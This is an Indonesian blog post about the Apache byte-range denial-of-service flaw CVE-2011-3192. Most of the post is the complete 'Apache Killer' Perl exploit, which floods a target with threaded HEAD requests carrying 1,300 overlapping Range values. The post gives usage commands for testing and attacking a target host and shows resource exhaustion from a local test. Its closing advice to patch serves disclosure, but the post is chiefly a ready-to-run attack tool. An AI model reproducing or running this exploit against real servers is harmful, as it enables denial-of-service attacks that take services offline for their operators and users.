APACHE DoS Vulnerability (CVE-2011-3192)

Sekedar info (mungkin sudah banyak yg tahu) kalau terdapat vulnerability pada Apache HTTP Server 1.3.x dan 2.x.x hingga 2.2.19.

klo di database vulnerability mitre.org nama vulnerabilitynya adalah CVE-2011-3192, lebih lengkapnya klik disini.

vulnerability ini mengeksploitasi kelemahan Apache dalam menerima range request httpd, sehingga membuat prosesor dan memory server exhausted.

vulnerability ini telah dipatch oleh Apache.org dengan mengeluarkan versi terbaru 2.2.20 pada 31 Agustus 2011 kemarin.

berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja), namanya Apache Killer:

#!/usr/bin/perl

#Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
#Original by Kingcope
#Altered by W
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use threads;

sub usage
{
print "Apache Remote Denial of Service (CPU & memory exhaustion)n";
print "Originally by Kingcopen";
print "Altered to use threads by Wn";
print "Usage: $0 <attack> <host> [page=/] [threads=50]n";
print "Example: $0 YES www.example.com index.html 50n";
print "If attack is anything other than 'YES', then the tool will test and exit.n";
}

sub testapache
{
print "Testing for partial content exploit against $host$path...n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto&nbsp;&nbsp;&nbsp; => 'tcp') or die "Can't open socket to $host!n";

my $p = "HEAD $path HTTP/1.1rnHost: $hostrnRange:bytes=0-5rnAccept-Encoding: gziprnConnection: closernrn";
print $sock $p;

my $x = <$sock>;
if ($x =~ /Partial/)
{
print "Host: $host appears to be vulnerable to partial content DoSn";
return 1;
} else {
print "Host: $host appears to not be vulnerable, returned:n$x";
return 0;
}
}

sub exploitserver
{
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto&nbsp;&nbsp;&nbsp; => 'tcp') or return(0);
print $sock $p;

while(<$sock>)
{
}
print ".";
}

if($#ARGV < 1)
{
&usage && exit;
}

$real = ($ARGV[0] eq 'YES');
$host = $ARGV[1];
$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';
$numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;
$vuln = &testapache;

srand(time());
my $r = "";

for ($k=0;$k<1300;$k++)
{
$r .= ",5-$k";
}

$p = "HEAD $path HTTP/1.1rnHost: $hostrnRange:bytes=0-5$rrnAccept-Encoding: gziprnConnection: closernrn";
if($vuln && $real)
{
my @threads;
$|=1;

print "Running partial content exploit against $host$path using $numthreads threadsn";
for(my $n = 0; $n < $numthreads; $n++)
{
my $thr = async { while(1){ &exploitserver; } };
push(@threads, $thr);
}
foreach(@threads)
{
$_->join();
print($_);
}
}

cara penggunaan skrip diatas adalah:
1. untuk mengetahui apakah server web Apache tersebut vulnerable atau tidak

perl filename.pl www.target.com

2. untuk melakukan eksploitasi

perl filename.pl YES www.target.com

 

ini yg telah ane coba di localhost BT5 dengan Apache versi 2.2.14:

dan hasilnya seperti berikut:

lihat pada Cpu(s): 92.5%us dan Mem:   3094072k total, 2748296k used,   345776k free, lihat juga pada services Apache2 dengan PID berbeda-beda dibawahnya

processor dan RAM kita dibuat bekerja secara maksimal, hal ini pastinya akan menyebabkan server akan mengalami out of service…

jadi segera update Apache server anda 🙂

semoga bermanfaat
M

Sumber:

  • https://infosecisland.com/blogview/16214-Apache-Killer-DoS-Vulnerability-Patch-Released.html
  • https://httpd.apache.org/security/vulnerabilities_22.html
  • https://tanyarezaervani.wordpress.com/2011/09/02/artikel-khusus-menyerang-server-dengan-apache-killer/
  • Pastebin

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
Notify of